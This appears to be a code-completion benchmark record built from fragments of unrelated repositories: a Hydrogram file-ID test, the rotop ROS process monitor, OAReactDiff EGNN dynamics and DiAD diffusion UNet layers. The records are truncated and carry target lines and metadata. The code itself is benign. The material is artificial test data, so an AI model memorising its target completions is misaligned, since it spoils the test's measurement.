# along with Hydrogram. If not, see <http://www.gnu.org/licenses/>.
def check(file_id: str, expected_file_type: FileType):
    decoded = FileId.decode(file_id)
    assert decoded.file_type == expected_file_type
    assert decoded.encode() == file_id
| def check_unique(file_unique_id: str, expected_file_unique_type: FileUniqueType): | 3 | 2023-10-29 16:16:37+00:00 | 4k |
iwatake2222/rotop | src/rotop/rotop.py | [
{
"identifier": "DataContainer",
"path": "src/rotop/data_container.py",
"snippet": "class DataContainer:\n MAX_ROW_CSV = 600\n MAX_NUM_HISTORY = 100\n\n def __init__(self, write_csv=False):\n now = datetime.datetime.now()\n if write_csv:\n self.csv_dir_name = now.strftime('./rotop_%Y%m%d_%H%M%S')\n os.mkdir(self.csv_dir_name)\n else:\n self.csv_dir_name = None\n self.csv_index = 0\n self.df_cpu = pd.DataFrame()\n self.df_mem = pd.DataFrame()\n self.df_cpu_history = pd.DataFrame()\n self.df_mem_history = pd.DataFrame()\n\n def run(self, top_runner: TopRunner, lines: list[str], num_process: int):\n if top_runner.col_range_command and top_runner.col_range_command[0] > 0:\n df_cpu_current, df_mem_current = self.create_df_from_top(top_runner, lines, num_process)\n self.df_cpu = pd.concat([self.df_cpu, df_cpu_current], axis=0)\n self.df_mem = pd.concat([self.df_mem, df_mem_current], axis=0)\n self.df_cpu_history = pd.concat([self.df_cpu_history, df_cpu_current], axis=0, ignore_index=True)\n self.df_mem_history = pd.concat([self.df_mem_history, df_mem_current], axis=0, ignore_index=True)\n if self.csv_dir_name:\n self.df_cpu.to_csv(os.path.join(self.csv_dir_name, f'cpu_{self.csv_index:03d}.csv'), index=False)\n self.df_mem.to_csv(os.path.join(self.csv_dir_name, f'mem_{self.csv_index:03d}.csv'), index=False)\n if len(self.df_cpu) >= self.MAX_ROW_CSV:\n self.df_cpu = pd.DataFrame()\n self.df_mem = pd.DataFrame()\n self.csv_index += 1\n if len(self.df_cpu_history) >= self.MAX_NUM_HISTORY:\n self.df_cpu_history = self.df_cpu_history[1:]\n self.df_mem_history = self.df_mem_history[1:]\n\n self.df_cpu_history = self.sort_df_in_column(self.df_cpu_history)\n self.df_mem_history = self.sort_df_in_column(self.df_mem_history)\n\n return self.df_cpu_history, self.df_mem_history\n\n\n def reset_history(self):\n self.df_cpu_history = pd.DataFrame()\n self.df_mem_history = pd.DataFrame()\n\n\n @staticmethod\n def sort_df_in_column(df: pd.DataFrame):\n df = df.sort_values(by=len(df)-1, axis=1, ascending=False)\n return df\n\n\n @staticmethod\n def create_df_from_top(top_runner: TopRunner, lines: list[str], num_process: int):\n # now = datetime.datetime.now()\n now = int(time.time())\n for i, line in enumerate(lines):\n if 'PID' in line:\n lines = lines[i + 1:]\n break\n\n process_list = []\n cpu_list = []\n mem_list = []\n for i, line in enumerate(lines):\n if i >= num_process:\n break\n pid = line[top_runner.col_range_pid[0]:top_runner.col_range_pid[1]].strip()\n command = line[top_runner.col_range_command[0]:].strip()\n process_name = str(f'{command} ({pid})')\n process_list.append(process_name)\n cpu = float(line[top_runner.col_range_CPU[0]:top_runner.col_range_CPU[1]].strip())\n cpu_list.append(cpu)\n mem = float(line[top_runner.col_range_MEM[0]:top_runner.col_range_MEM[1]].strip())\n mem_list.append(mem)\n\n df_cpu_current = pd.DataFrame([[now] + cpu_list], columns=['datetime'] + process_list)\n df_mem_current = pd.DataFrame([[now] + mem_list], columns=['datetime'] + process_list)\n\n return df_cpu_current, df_mem_current"
},
{
"identifier": "TopRunner",
"path": "src/rotop/top_runner.py",
"snippet": "class TopRunner:\n def __init__(self, interval, filter):\n self.child = pexpect.spawn(f'top -cb -d {interval} -o %CPU -w 512')\n self.filter_re = self.create_filter_re(filter)\n self.ros_re = self.create_filter_re('--ros-arg|/opt/ros')\n self.col_range_list_to_display = None\n self.col_range_pid = None\n self.col_range_CPU = None\n self.col_range_MEM = None\n self.col_range_command = None\n self.next_after = ''\n\n\n def __del__(self):\n signal.signal(signal.SIGINT, signal.SIG_IGN) # ignore ctrl-c while closing\n self.child.close()\n\n\n def run(self, max_num_process, show_all=False, only_ros=False):\n # get the result string of top command\n self.child.expect(r'top - .*load average:')\n before = self.child.before\n previous_after = self.next_after\n self.next_after = self.child.after\n if before == '' or previous_after == '' or self.next_after == '':\n return None, None\n top_str = (previous_after + before).decode('utf-8')\n orgial_lines = top_str.splitlines()\n\n result_lines = []\n result_show_all_lines = []\n row_process_info = 0\n\n # System Information\n for line in orgial_lines:\n result_lines.append(line)\n result_show_all_lines.append(line)\n if 'PID' in line:\n break\n\n # get layout information from process header line\n row_process_info = len(result_lines)\n process_header_org = result_lines[-1]\n self.analyze_cols(process_header_org, show_all)\n\n process_header = ''\n for range in self.col_range_list_to_display:\n process_header += process_header_org[range[0]:range[1]]\n result_lines[-1] = process_header\n\n # Process Information\n for line in orgial_lines[row_process_info:]:\n if self.col_range_command and self.col_range_command[0] > 0 and len(line) > self.col_range_command[0]:\n process_info_org = line[:self.col_range_command[0]]\n process_info = ''\n for range in self.col_range_list_to_display:\n process_info += process_info_org[range[0]:range[1]]\n command_str = line[self.col_range_command[0]:]\n if not self.filter_re.match(command_str):\n continue\n if only_ros and not self.ros_re.match(command_str):\n continue\n command_str = self.parse_command_str(command_str)\n\n line = process_info + command_str\n show_all_line = process_info_org + command_str\n\n result_lines.append(line)\n result_show_all_lines.append(show_all_line)\n if len(result_lines) >= row_process_info + max_num_process:\n break\n\n return result_lines, result_show_all_lines\n\n\n def analyze_cols(self, process_header: str, show_all: bool):\n if self.col_range_command is None or self.col_range_command[0] == -1:\n self.col_range_list_to_display = self.get_col_range_list_to_display(process_header, show_all)\n self.col_range_pid = TopRunner.get_col_range_PID(process_header)\n self.col_range_CPU = TopRunner.get_col_range_CPU(process_header)\n self.col_range_MEM = TopRunner.get_col_range_MEM(process_header)\n self.col_range_command = TopRunner.get_col_range_command(process_header)\n return\n\n\n\n @staticmethod\n def create_filter_re(filter_str):\n if '.*' not in filter_str:\n filter_str = '.*' + filter_str + '.*'\n filter_re = re.compile(filter_str)\n return filter_re\n\n\n @staticmethod\n def get_row_start_list(lines: list[str])->list[int]:\n row_list = []\n for i, line in enumerate(lines):\n if 'top' in line and 'load average' in line:\n row_list.append(i)\n return row_list\n\n\n @staticmethod\n def get_col_range_command(process_info_header_line: str):\n start_col = process_info_header_line.find('COMMAND')\n end_col = len(process_info_header_line) - 1\n return (start_col, end_col)\n\n\n 
@staticmethod\n def get_col_range_PID(process_info_header_line: str):\n start_col = 0\n end_col = process_info_header_line.find('PID') + len('PID')\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_CPU(process_info_header_line: str):\n start_col = process_info_header_line.find('SHR S') + len('SHR S')\n end_col = process_info_header_line.find('%CPU') + len('%CPU')\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_MEM(process_info_header_line: str):\n start_col = process_info_header_line.find('%CPU') + len('%CPU')\n end_col = process_info_header_line.find('%MEM') + len('%MEM')\n return (start_col, end_col)\n\n\n @staticmethod\n def get_col_range_list_to_display(process_info_header_line: str, show_all=False):\n range_list = []\n\n if show_all:\n range_list.append((0, len(process_info_header_line)))\n else:\n start_col = 0\n end_col = process_info_header_line.find('PID') + len('PID')\n range_list.append((start_col, end_col))\n\n start_col = process_info_header_line.find('NI') + len('NI')\n end_col = process_info_header_line.find('%MEM') + len('%MEM')\n range_list.append((start_col, end_col))\n\n start_col = process_info_header_line.find('COMMAND') - 1\n end_col = len(process_info_header_line)\n range_list.append((start_col, end_col))\n\n return range_list\n\n\n @staticmethod\n def parse_component_container_command(command):\n cmd = command.split()[0].split('/')[-1]\n idx_node = command.find('__node')\n if idx_node > 0:\n node = command[idx_node:].split()[0].split('=')[-1]\n cmd = node\n idx_ns = command.find('__ns')\n if idx_ns > 0:\n ns = command[idx_ns:].split()[0].split('=')[-1]\n # cmd = cmd + ', ' + node + ', ' + ns\n cmd += ', ' + ns\n return cmd\n\n\n @staticmethod\n def parse_python_command(command):\n cmd_list = command.split()\n cmd = cmd_list[0].split('/')[-1]\n if len(cmd_list) > 1:\n if cmd_list[1][0] == '-':\n python_file = cmd_list[-1]\n else:\n python_file = cmd_list[1]\n python_file = python_file.split('/')[-1]\n\n ros2_option = ''\n if 'ros2' == python_file:\n ros2_option = ' '.join(cmd_list[2:5])\n\n cmd = cmd + ' ' + python_file + ' ' + ros2_option\n return cmd\n\n\n @staticmethod\n def parse_command_str(command):\n param_for_ros2 = ['__node', '__ns']\n if '[' == command[0]:\n # kernel process\n command = command\n elif any(item in command for item in param_for_ros2):\n command = TopRunner.parse_component_container_command(command)\n elif 'python' in command:\n command = TopRunner.parse_python_command(command)\n else:\n # normal process\n command = command.split()[0].split('/')[-1]\n return command"
},
{
"identifier": "gui_main",
"path": "src/rotop/gui_main.py",
"snippet": "def gui_main(args):\n global g_reset_history_df\n top_runner = TopRunner(args.interval, args.filter)\n data_container = DataContainer(args.csv)\n\n view = GuiView()\n gui_thread = threading.Thread(target=gui_loop, args=(view,))\n gui_thread.start()\n\n try:\n while True:\n if g_reset_history_df:\n data_container.reset_history()\n g_reset_history_df = False\n\n result_lines, result_show_all_lines = top_runner.run(args.num_process, True, args.only_ros)\n if result_show_all_lines is None:\n time.sleep(0.1)\n continue\n\n df_cpu_history, df_mem_history = data_container.run(top_runner, result_show_all_lines, args.num_process)\n df_cpu_history = df_cpu_history.iloc[:, :min(args.num_process, len(df_cpu_history.columns))]\n df_mem_history = df_mem_history.iloc[:, :min(args.num_process, len(df_mem_history.columns))]\n\n if gui_thread.is_alive():\n view.update_gui(result_lines, df_cpu_history, df_mem_history)\n else:\n break\n\n except KeyboardInterrupt:\n pass\n\n view.exit()\n gui_thread.join()"
},
{
"identifier": "create_logger",
"path": "src/rotop/utility.py",
"snippet": "def create_logger(name, level: int=logging.DEBUG, log_filename: str=None) -> logging.Logger:\n handler_format = logging.Formatter('[%(asctime)s][%(levelname)-7s][%(filename)s:%(lineno)s] %(message)s')\n # stream_handler = logging .StreamHandler()\n # stream_handler.setLevel(level)\n # stream_handler.setFormatter(handler_format)\n logger = logging.getLogger(name)\n logger.propagate = False\n logger.setLevel(level)\n # logger.addHandler(stream_handler)\n # if log_filename:\n # file_handler = logging.FileHandler(log_filename)\n # file_handler.setLevel(level)\n # file_handler.setFormatter(handler_format)\n # logger.addHandler(file_handler)\n return logger"
}
] | import argparse
import curses
import time
from .data_container import DataContainer
from .top_runner import TopRunner
from .gui_main import gui_main
from .utility import create_logger
from ._version import version
from .version_dummy import version | 3,440 | # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| # Copyright 2023 iwatake2222
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import annotations
try:
except:
| logger = create_logger(__name__, log_filename='rotop.log') | 3 | 2023-10-30 22:21:05+00:00 | 4k |
chenruduan/OAReactDiff | oa_reactdiff/dynamics/egnn_dynamics.py | [
{
"identifier": "EGNN",
"path": "oa_reactdiff/model/egnn.py",
"snippet": "class EGNN(nn.Module):\n def __init__(\n self,\n in_node_nf: int = 8,\n in_edge_nf: int = 2,\n hidden_nf: int = 256,\n edge_hidden_nf: int = 32,\n act_fn: str = \"swish\",\n n_layers: int = 3,\n attention: int = False,\n out_node_nf: Optional[int] = None,\n tanh: bool = False,\n coords_range: float = 15.0,\n norm_constant: float = 1.0,\n inv_sublayers: int = 2,\n sin_embedding: bool = False,\n normalization_factor: float = 100.0,\n aggregation_method: str = \"sum\",\n reflect_equiv: bool = True,\n ):\n r\"\"\"_summary_\n\n Args:\n in_node_nf (int): number of input node feature. Defaults to 8.\n in_edge_nf (int): number of input edge feature. Defaults to 2.\n hidden_nf (int): number of hidden units. Defaults to 256.\n act_fn (str): activation function. Defaults to \"swish\".\n n_layers (int): number of equivariant update block. Defaults to 3.\n attention (int): whether to use self attention. Defaults to False.\n out_node_nf (Optional[int]): number of output node features.\n Defaults to None to set the same as in_node_nf\n coords_range (float): range factor, only used in tanh = True.\n Defaults to 15.0.\n norm_constant (float): distance normalizating factor. Defaults to 1.0.\n inv_sublayers (int): number of GCL in an equivariant update block.\n Defaults to 2.\n sin_embedding (Optional[nn.Module]): whether to use edge distance embedding.\n Defaults to None.\n normalization_factor (float): distance normalization used in coord2diff.\n Defaults to 1.0.\n aggregation_method (str): aggregation options in scattering.\n Defaults to \"sum\".\n reflect_equiv (bool): whether to ignore reflection.\n Defaults to True.\n \"\"\"\n super().__init__()\n if out_node_nf is None:\n out_node_nf = in_node_nf\n self.hidden_nf = hidden_nf\n self.edge_hidden_nf = edge_hidden_nf\n self.n_layers = n_layers\n self.coords_range_layer = float(coords_range / n_layers)\n self.normalization_factor = normalization_factor\n self.aggregation_method = aggregation_method\n self.reflect_equiv = reflect_equiv\n\n edge_feat_nf = in_edge_nf\n if sin_embedding:\n self.sin_embedding = SinusoidsEmbeddingNew()\n self.dist_dim = self.sin_embedding.dim\n else:\n self.sin_embedding = None\n self.dist_dim = 1\n\n self.edge_feat_nf = edge_feat_nf + self.dist_dim\n\n self.embedding = nn.Linear(in_node_nf, self.hidden_nf)\n self.embedding_out = nn.Linear(self.hidden_nf, out_node_nf)\n\n self.edge_embedding = nn.Linear(\n self.edge_feat_nf, self.hidden_nf - self.dist_dim\n )\n self.edge_embedding_out = nn.Linear(\n self.hidden_nf - self.dist_dim, self.edge_feat_nf\n )\n for i in range(0, n_layers):\n self.add_module(\n \"e_block_%d\" % i,\n EquivariantBlock(\n hidden_nf,\n edge_feat_nf=edge_feat_nf,\n act_fn=act_fn,\n n_layers=inv_sublayers,\n attention=attention,\n tanh=tanh,\n coords_range=coords_range,\n norm_constant=norm_constant,\n sin_embedding=self.sin_embedding,\n normalization_factor=normalization_factor,\n aggregation_method=aggregation_method,\n reflect_equiv=reflect_equiv,\n ),\n )\n\n def forward(\n self,\n h: Tensor,\n pos: Tensor,\n edge_index: Tensor,\n edge_attr: Optional[Tensor] = None,\n node_mask: Optional[Tensor] = None,\n edge_mask: Optional[Tensor] = None,\n update_coords_mask: Optional[Tensor] = None,\n subgraph_mask: Optional[Tensor] = None,\n ) -> Tuple[Tensor, Tensor, Tensor]:\n r\"\"\"\n\n Args:\n h (Tensor): [n_nodes, n_hidden], node features.\n pos (Tensor): [n_nodes, n_dim (3 in 3D space)], position tensor.\n edge_index (Tensor): [2, n_edge], edge index {ij}\n edge_attr (Optional[Tensor]): [n_edge, 
edge_feature_dim]. edge attributes.\n Defaults to None.\n node_mask (Optional[Tensor]): [n_node, 1], mask for node updates.\n Defaults to None.\n edge_mask (Optional[Tensor]): [n_edge, 1], mask for edge updates.\n Defaults to None.\n update_coords_mask (Optional[Tensor]): [n_node, 1], mask for position updates.\n Defaults to None.\n subgraph_mask (Optional[Tensor]): n_edge, 1], mask for positions aggregations.\n The idea is keep subgraph (i.e., fragment) level equivariance.\n Defaults to None.\n\n Returns:\n Tuple[Tensor, Tensor, Tensor]: updated h, pos, edge_attr\n \"\"\"\n # Edit Emiel: Remove velocity as input\n distances, _ = coord2diff(pos, edge_index)\n if subgraph_mask is not None:\n distances = distances * subgraph_mask\n\n if self.sin_embedding is not None:\n distances = self.sin_embedding(distances)\n if edge_attr is None or edge_attr.size(-1) == 0:\n edge_attr = distances\n else:\n edge_attr = torch.concat([distances, edge_attr], dim=-1)\n edge_attr = self.edge_embedding(edge_attr)\n h = self.embedding(h)\n # edge_index_ji = get_ji_bond_index(edge_index)\n # edge_attr = symmetrize_edge(edge_attr, edge_index_ji)\n\n for i in range(0, self.n_layers):\n h, pos, edge_attr = self._modules[\"e_block_%d\" % i](\n h,\n pos,\n edge_index,\n edge_attr=edge_attr,\n node_mask=node_mask,\n edge_mask=edge_mask,\n update_coords_mask=update_coords_mask,\n subgraph_mask=subgraph_mask,\n )\n\n # edge_attr = symmetrize_edge(edge_attr, edge_index_ji)\n\n # Important, the bias of the last linear might be non-zero\n h = self.embedding_out(h)\n edge_attr = self.edge_embedding_out(edge_attr)\n\n if node_mask is not None:\n h = h * node_mask\n if edge_mask is not None:\n edge_attr = edge_attr * edge_mask\n return h, pos, edge_attr"
},
{
"identifier": "get_subgraph_mask",
"path": "oa_reactdiff/utils/_graph_tools.py",
"snippet": "def get_subgraph_mask(edge_index: Tensor, n_frag_switch: Tensor) -> Tensor:\n r\"\"\"Filter out edges that have inter-fragment connections.\n Example:\n edge_index: [\n [0, 0, 1, 1, 2, 2],\n [1, 2, 0, 2, 0, 1],\n ]\n n_frag_switch: [0, 0, 1]\n -> [1, 0, 1, 0, 0, 0]\n\n Args:\n edge_index (Tensor): e_ij\n n_frag_switch (Tensor): fragment that a node belongs to\n\n Returns:\n Tensor: [n_edge], 1 for inner- and 0 for inter-fragment edge\n \"\"\"\n subgraph_mask = torch.zeros(edge_index.size(1)).long()\n in_same_frag = n_frag_switch[edge_index[0]] == n_frag_switch[edge_index[1]]\n subgraph_mask[torch.where(in_same_frag)] = 1\n return subgraph_mask.to(edge_index.device)"
},
{
"identifier": "BaseDynamics",
"path": "oa_reactdiff/dynamics/_base.py",
"snippet": "class BaseDynamics(nn.Module):\n def __init__(\n self,\n model_config: Dict,\n fragment_names: List[str],\n node_nfs: List[int],\n edge_nf: int,\n condition_nf: int = 0,\n pos_dim: int = 3,\n update_pocket_coords: bool = True,\n condition_time: bool = True,\n edge_cutoff: Optional[float] = None,\n model: nn.Module = EGNN,\n device: torch.device = torch.device(\"cuda\"),\n enforce_same_encoding: Optional[List] = None,\n source: Optional[Dict] = None,\n ) -> None:\n r\"\"\"Base dynamics class set up for denoising process.\n\n Args:\n model_config (Dict): config for the equivariant model.\n fragment_names (List[str]): list of names for fragments\n node_nfs (List[int]): list of number of input node attributues.\n edge_nf (int): number of input edge attributes.\n condition_nf (int): number of attributes for conditional generation.\n Defaults to 0.\n pos_dim (int): dimension for position vector. Defaults to 3.\n update_pocket_coords (bool): whether to update positions of everything.\n Defaults to True.\n condition_time (bool): whether to condition on time. Defaults to True.\n edge_cutoff (Optional[float]): cutoff for building intra-fragment edges.\n Defaults to None.\n model (Optional[nn.Module]): Module for equivariant model. Defaults to None.\n \"\"\"\n super().__init__()\n assert len(node_nfs) == len(fragment_names)\n for nf in node_nfs:\n assert nf > pos_dim\n if \"act_fn\" not in model_config:\n model_config[\"act_fn\"] = \"swish\"\n if \"in_node_nf\" not in model_config:\n model_config[\"in_node_nf\"] = model_config[\"in_hidden_channels\"]\n self.model_config = model_config\n self.node_nfs = node_nfs\n self.edge_nf = edge_nf\n self.condition_nf = condition_nf\n self.fragment_names = fragment_names\n self.pos_dim = pos_dim\n self.update_pocket_coords = update_pocket_coords\n self.condition_time = condition_time\n self.edge_cutoff = edge_cutoff\n self.device = device\n\n if model is None:\n model = EGNN\n self.model = model(**model_config)\n if source is not None:\n self.model.load_state_dict(source[\"model\"])\n self.dist_dim = self.model.dist_dim if hasattr(self.model, \"dist_dim\") else 0\n\n self.embed_dim = model_config[\"in_node_nf\"]\n self.edge_embed_dim = (\n model_config[\"in_edge_nf\"] if \"in_edge_nf\" in model_config else 0\n )\n if condition_time:\n self.embed_dim -= 1\n if condition_nf > 0:\n self.embed_dim -= condition_nf\n assert self.embed_dim > 0\n\n self.build_encoders_decoders(enforce_same_encoding, source)\n del source\n\n def build_encoders_decoders(\n self,\n enfoce_name_encoding: Optional[List] = None,\n source: Optional[Dict] = None,\n ):\n r\"\"\"Build encoders and decoders for nodes and edges.\"\"\"\n self.encoders = nn.ModuleList()\n self.decoders = nn.ModuleList()\n for ii, name in enumerate(self.fragment_names):\n self.encoders.append(\n MLP(\n in_dim=self.node_nfs[ii] - self.pos_dim,\n out_dims=[2 * (self.node_nfs[ii] - self.pos_dim), self.embed_dim],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n )\n self.decoders.append(\n MLP(\n in_dim=self.embed_dim,\n out_dims=[\n 2 * (self.node_nfs[ii] - self.pos_dim),\n self.node_nfs[ii] - self.pos_dim,\n ],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n )\n if enfoce_name_encoding is not None:\n for ii in enfoce_name_encoding:\n self.encoders[ii] = self.encoders[0]\n self.decoders[ii] = self.decoders[0]\n if source is not None:\n self.encoders.load_state_dict(source[\"encoders\"])\n 
self.decoders.load_state_dict(source[\"decoders\"])\n\n if self.edge_embed_dim > 0:\n self.edge_encoder = MLP(\n in_dim=self.edge_nf,\n out_dims=[2 * self.edge_nf, self.edge_embed_dim],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n self.edge_decoder = MLP(\n in_dim=self.edge_embed_dim + self.dist_dim,\n out_dims=[2 * self.edge_nf, self.edge_nf],\n activation=self.model_config[\"act_fn\"],\n last_layer_no_activation=True,\n )\n else:\n self.edge_encoder, self.edge_decoder = None, None\n\n def forward(self):\n raise NotImplementedError"
}
] | from typing import Dict, List, Optional, Tuple
from torch import nn, Tensor
from torch_scatter import scatter_mean
from oa_reactdiff.model import EGNN
from oa_reactdiff.utils._graph_tools import get_subgraph_mask
from ._base import BaseDynamics
import numpy as np
import torch | 3,293 |
class EGNNDynamics(BaseDynamics):
def __init__(
self,
model_config: Dict,
fragment_names: List[str],
node_nfs: List[int],
edge_nf: int,
condition_nf: int = 0,
pos_dim: int = 3,
update_pocket_coords: bool = True,
condition_time: bool = True,
edge_cutoff: Optional[float] = None, | model: nn.Module = EGNN, | 0 | 2023-10-30 02:53:38+00:00 | 4k |
lewandofskee/DiAD | ldm/modules/diffusionmodules/openaimodel.py | [
{
"identifier": "checkpoint",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def checkpoint(func, inputs, params, flag):\n \"\"\"\n Evaluate a function without caching intermediate activations, allowing for\n reduced memory at the expense of extra compute in the backward pass.\n :param func: the function to evaluate.\n :param inputs: the argument sequence to pass to `func`.\n :param params: a sequence of parameters `func` depends on but does not\n explicitly take as arguments.\n :param flag: if False, disable gradient checkpointing.\n \"\"\"\n if flag:\n args = tuple(inputs) + tuple(params)\n return CheckpointFunction.apply(func, len(inputs), *args)\n else:\n return func(*inputs)"
},
{
"identifier": "conv_nd",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def conv_nd(dims, *args, **kwargs):\n \"\"\"\n Create a 1D, 2D, or 3D convolution module.\n \"\"\"\n if dims == 1:\n return nn.Conv1d(*args, **kwargs)\n elif dims == 2:\n return nn.Conv2d(*args, **kwargs)\n elif dims == 3:\n return nn.Conv3d(*args, **kwargs)\n raise ValueError(f\"unsupported dimensions: {dims}\")"
},
{
"identifier": "linear",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def linear(*args, **kwargs):\n \"\"\"\n Create a linear module.\n \"\"\"\n return nn.Linear(*args, **kwargs)"
},
{
"identifier": "avg_pool_nd",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def avg_pool_nd(dims, *args, **kwargs):\n \"\"\"\n Create a 1D, 2D, or 3D average pooling module.\n \"\"\"\n if dims == 1:\n return nn.AvgPool1d(*args, **kwargs)\n elif dims == 2:\n return nn.AvgPool2d(*args, **kwargs)\n elif dims == 3:\n return nn.AvgPool3d(*args, **kwargs)\n raise ValueError(f\"unsupported dimensions: {dims}\")"
},
{
"identifier": "zero_module",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def zero_module(module):\n \"\"\"\n Zero out the parameters of a module and return it.\n \"\"\"\n for p in module.parameters():\n p.detach().zero_()\n return module"
},
{
"identifier": "normalization",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def normalization(channels):\n \"\"\"\n Make a standard normalization layer.\n :param channels: number of input channels.\n :return: an nn.Module for normalization.\n \"\"\"\n return GroupNorm32(32, channels)"
},
{
"identifier": "timestep_embedding",
"path": "ldm/modules/diffusionmodules/util.py",
"snippet": "def timestep_embedding(timesteps, dim, max_period=10000, repeat_only=False):\n \"\"\"\n Create sinusoidal timestep embeddings.\n :param timesteps: a 1-D Tensor of N indices, one per batch element.\n These may be fractional.\n :param dim: the dimension of the output.\n :param max_period: controls the minimum frequency of the embeddings.\n :return: an [N x dim] Tensor of positional embeddings.\n \"\"\"\n if not repeat_only:\n half = dim // 2\n freqs = torch.exp(\n -math.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32) / half\n ).to(device=timesteps.device)\n args = timesteps[:, None].float() * freqs[None]\n embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)\n if dim % 2:\n embedding = torch.cat([embedding, torch.zeros_like(embedding[:, :1])], dim=-1)\n else:\n embedding = repeat(timesteps, 'b -> b d', d=dim)\n return embedding"
},
{
"identifier": "SpatialTransformer",
"path": "ldm/modules/attention.py",
"snippet": "class SpatialTransformer(nn.Module):\n \"\"\"\n Transformer block for image-like data.\n First, project the input (aka embedding)\n and reshape to b, t, d.\n Then apply standard transformer action.\n Finally, reshape to image\n NEW: use_linear for more efficiency instead of the 1x1 convs\n \"\"\"\n def __init__(self, in_channels, n_heads, d_head,\n depth=1, dropout=0., context_dim=None,\n disable_self_attn=False, use_linear=False,\n use_checkpoint=True):\n super().__init__()\n if exists(context_dim) and not isinstance(context_dim, list):\n context_dim = [context_dim]\n self.in_channels = in_channels\n inner_dim = n_heads * d_head\n self.norm = Normalize(in_channels)\n if not use_linear:\n self.proj_in = nn.Conv2d(in_channels,\n inner_dim,\n kernel_size=1,\n stride=1,\n padding=0)\n else:\n self.proj_in = nn.Linear(in_channels, inner_dim)\n\n self.transformer_blocks = nn.ModuleList(\n [BasicTransformerBlock(inner_dim, n_heads, d_head, dropout=dropout, context_dim=context_dim[d],\n disable_self_attn=disable_self_attn, checkpoint=use_checkpoint)\n for d in range(depth)]\n )\n if not use_linear:\n self.proj_out = zero_module(nn.Conv2d(inner_dim,\n in_channels,\n kernel_size=1,\n stride=1,\n padding=0))\n else:\n self.proj_out = zero_module(nn.Linear(in_channels, inner_dim))\n self.use_linear = use_linear\n\n def forward(self, x, context=None):\n # note: if no context is given, cross-attention defaults to self-attention\n if not isinstance(context, list):\n context = [context]\n b, c, h, w = x.shape\n x_in = x\n x = self.norm(x)\n if not self.use_linear:\n x = self.proj_in(x)\n x = rearrange(x, 'b c h w -> b (h w) c').contiguous()\n if self.use_linear:\n x = self.proj_in(x)\n for i, block in enumerate(self.transformer_blocks):\n x = block(x, context=context[i])\n if self.use_linear:\n x = self.proj_out(x)\n x = rearrange(x, 'b (h w) c -> b c h w', h=h, w=w).contiguous()\n if not self.use_linear:\n x = self.proj_out(x)\n return x + x_in"
},
{
"identifier": "exists",
"path": "ldm/util.py",
"snippet": "def exists(x):\n return x is not None"
}
] | from abc import abstractmethod
from ldm.modules.diffusionmodules.util import (
checkpoint,
conv_nd,
linear,
avg_pool_nd,
zero_module,
normalization,
timestep_embedding,
)
from ldm.modules.attention import SpatialTransformer
from ldm.util import exists
from omegaconf.listconfig import ListConfig
import math
import numpy as np
import torch as th
import torch.nn as nn
import torch.nn.functional as F | 3,310 |
# dummy replace
def convert_module_to_f16(x):
pass
def convert_module_to_f32(x):
pass
## go
class AttentionPool2d(nn.Module):
"""
Adapted from CLIP: https://github.com/openai/CLIP/blob/main/clip/model.py
"""
def __init__(
self,
spacial_dim: int,
embed_dim: int,
num_heads_channels: int,
output_dim: int = None,
):
super().__init__()
self.positional_embedding = nn.Parameter(th.randn(embed_dim, spacial_dim ** 2 + 1) / embed_dim ** 0.5)
self.qkv_proj = conv_nd(1, embed_dim, 3 * embed_dim, 1)
self.c_proj = conv_nd(1, embed_dim, output_dim or embed_dim, 1)
self.num_heads = embed_dim // num_heads_channels
self.attention = QKVAttention(self.num_heads)
def forward(self, x):
b, c, *_spatial = x.shape
x = x.reshape(b, c, -1) # NC(HW)
x = th.cat([x.mean(dim=-1, keepdim=True), x], dim=-1) # NC(HW+1)
x = x + self.positional_embedding[None, :, :].to(x.dtype) # NC(HW+1)
x = self.qkv_proj(x)
x = self.attention(x)
x = self.c_proj(x)
return x[:, :, 0]
class TimestepBlock(nn.Module):
"""
Any module where forward() takes timestep embeddings as a second argument.
"""
@abstractmethod
def forward(self, x, emb):
"""
Apply the module to `x` given `emb` timestep embeddings.
"""
class TimestepEmbedSequential(nn.Sequential, TimestepBlock):
"""
A sequential module that passes timestep embeddings to the children that
support it as an extra input.
"""
def forward(self, x, emb, context=None):
for layer in self:
if isinstance(layer, TimestepBlock):
x = layer(x, emb)
elif isinstance(layer, SpatialTransformer):
x = layer(x, context)
else:
x = layer(x)
return x
class Upsample(nn.Module):
"""
An upsampling layer with an optional convolution.
:param channels: channels in the inputs and outputs.
:param use_conv: a bool determining if a convolution is applied.
:param dims: determines if the signal is 1D, 2D, or 3D. If 3D, then
upsampling occurs in the inner-two dimensions.
"""
def __init__(self, channels, use_conv, dims=2, out_channels=None, padding=1, scale_guide=False):
super().__init__()
self.channels = channels
self.out_channels = out_channels or channels
self.use_conv = use_conv
self.dims = dims
self.scale_guide = scale_guide
if use_conv:
self.conv = conv_nd(dims, self.channels, self.out_channels, 3, padding=padding)
def forward(self, x):
assert x.shape[1] == self.channels
if self.dims == 3:
x = F.interpolate(
